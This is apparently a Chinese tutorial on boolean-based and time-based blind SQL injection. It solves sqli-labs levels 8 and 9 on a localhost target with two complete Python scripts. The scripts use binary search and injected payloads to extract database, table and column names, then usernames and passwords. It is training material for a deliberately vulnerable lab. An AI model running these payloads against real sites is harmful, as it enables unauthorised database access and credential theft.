SQL布尔盲注、时间盲注

一、布尔盲注

布尔盲注(Boolean-based Blind SQL Injection)是一种SQL注入技术,用于在应用程序不直接显示数据库查询结果的情况下,通过构造特定的SQL查询并根据页面返回的不同结果来推测数据库中的信息。这种方法依赖于SQL查询的结果是否为真或假,进而推断出数据库中的具体信息。

案例为sqlilabs中的第八关,采用二分查找

python脚本:

python 复制代码
import requests
def get_database(URL):
    # 获取数据库名称
    s = ""
    for i in range(1, 10):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (high > low):
            payload = {
                "id": f"1' and greatest(ascii(substr(database(),{i},1)),{mid})={mid} -- "}  # 相当于第一个字符<={mid}条件判断为真
            res = requests.get(url=URL, params=payload)
            if "You are in" in res.text:
                high = mid
                mid = (low + high) // 2
            else:
                low = mid + 1
                mid = (low + high) // 2
        s += chr(mid)
    print("数据库名称:" + s)


def get_table(URL):
    # 获取表名称
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (high > low):
            payload = {
                "id": f"1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid} -- "}
            res = requests.get(url=URL, params=payload)
            if "You are in" in res.text:
                low = mid + 1
                mid = (low + high) // 2
            else:
                high = mid
                mid = (low + high) // 2
        s += chr(mid)
    print("表的名称:" + s)


def get_column(URL):
    # 获取管理员的字段名称
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (high > low):
            payload = {
                "id": f"1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid} -- "}
            res = requests.get(url=URL, params=payload)
            if "You are in" in res.text:
                low = mid + 1
                mid = (low + high) // 2
            else:
                high = mid
                mid = (low + high) // 2
        s += chr(mid)
    print("users表的列:" + s)


def get_result(URl):
    # 获取用户名和密码信息
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (high > low):
            payload = {
                "id": f"1' and ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid} -- "}
            res = requests.get(url=URL, params=payload)
            if "You are in" in res.text:
                low = mid + 1
                mid = (low + high) // 2
            else:
                high = mid
                mid = (low + high) // 2
        s += chr(mid)
    print("users表具体数据:" + s)


if __name__ == '__main__':
    URL = "http://127.0.0.1/sqlilabs/Less-8/index.php"
    get_database(URL)
    get_table(URL)
    get_column(URL)
    get_result(URL)

运行结果

二、时间盲注

时间盲注(Time-based Blind SQL Injection)是一种SQL注入技术,用于在应用程序没有直接回显数据库查询结果的情况下,通过构造特定的SQL查询来推测数据库中的信息。这种方法依赖于数据库处理查询时产生的延迟响应来判断条件的真假。

案例为sqlilabs中的第九关,同样为二分查找

python脚本

python 复制代码
import requests
import datetime

def get_database(URL):
    # 获取数据库名称
    s = ""
    for i in range(1, 10):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (high > low):
            payload = {
                "id": f"1' and if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),sleep(3),1) -- "}  # 相当于第一个字符<={mid}条件判断为真
            start = datetime.datetime.now()
            res = requests.get(url=URL, params=payload)
            end = datetime.datetime.now()
            if (end - start).seconds >= 3:
                high = mid
                mid = (low + high) // 2
            else:
                low = mid + 1
                mid = (low + high) // 2
        s += chr(mid)
        print("数据库名称:" + s)


def get_table(URL):
    # 获取表名称
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (high > low):
            payload = {
                "id": f"1' and if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),sleep(3),1) -- "}
            start = datetime.datetime.now()
            res = requests.get(url=URL, params=payload)
            end = datetime.datetime.now()
            if (end - start).seconds >= 3:
                low = mid + 1
                mid = (low + high) // 2
            else:
                high = mid
                mid = (low + high) // 2
        s += chr(mid)
    print("表的名称:" + s)


def get_column(URL):
    # 获取管理员的字段名称
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (high > low):
            payload = {
                "id": f"1' and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),sleep(3),1) -- "}
            start = datetime.datetime.now()
            res = requests.get(url=URL, params=payload)
            end = datetime.datetime.now()
            if (end - start).seconds >= 3:
                low = mid + 1
                mid = (low + high) // 2
            else:
                high = mid
                mid = (low + high) // 2
        s += chr(mid)
    print("users表的列:" + s)


def get_result(URl):
    # 获取用户名和密码信息
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (high > low):
            payload = {
                "id": f"1' and if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),sleep(3),1) -- "}
            start = datetime.datetime.now()
            res = requests.get(url=URL, params=payload)
            end = datetime.datetime.now()
            if (end - start).seconds >= 3:
                low = mid + 1
                mid = (low + high) // 2
            else:
                high = mid
                mid = (low + high) // 2
        s += chr(mid)
    print("users中的具体数据:" + s)


if __name__ == '__main__':
    URL = "http://127.0.0.1/sqlilabs/Less-9/index.php"
    # get_database(URL)
    get_table(URL)
    # get_column(URL)
    # get_result(URL)

运行结果:

相关推荐
先鱼鲨生24 分钟前
etcd 的安装与使用
数据库·etcd
crossoverJie2 小时前
StarRocks 如何在本地搭建存算分离集群
数据库·后端
潇凝子潇2 小时前
如何在不停机的情况下,将MySQL单库的数据迁移到分库分表的架构上?
数据库·mysql·架构
Tapdata2 小时前
什么是 Operational Data Hub?它因何而生,又为何能够在当下成为技术共识?
数据库
这里有鱼汤2 小时前
普通人做量化,数据库该怎么选?
数据库·后端
BOOM朝朝朝3 小时前
Mongo索引
数据库·后端
许野平4 小时前
Rust:如何访问 *.ini 配置文件?
开发语言·数据库·rust·ini·configparser
程序终结者6 小时前
超越边界:MongoDB 16MB 文档限制的 pragmatic 解决方案
数据库·mongodb
正在走向自律6 小时前
SelectDB数据库,新一代实时数据仓库的全面解析与应用
数据库·数据仓库·实时数据仓库·selectdb·云原生存算分离·x2doris 迁移工具·mysql 协议兼容
昵称是6硬币6 小时前
MongoDB系列教程-第四章:MongoDB Compass可视化和管理MongoDB数据库
数据库·mongodb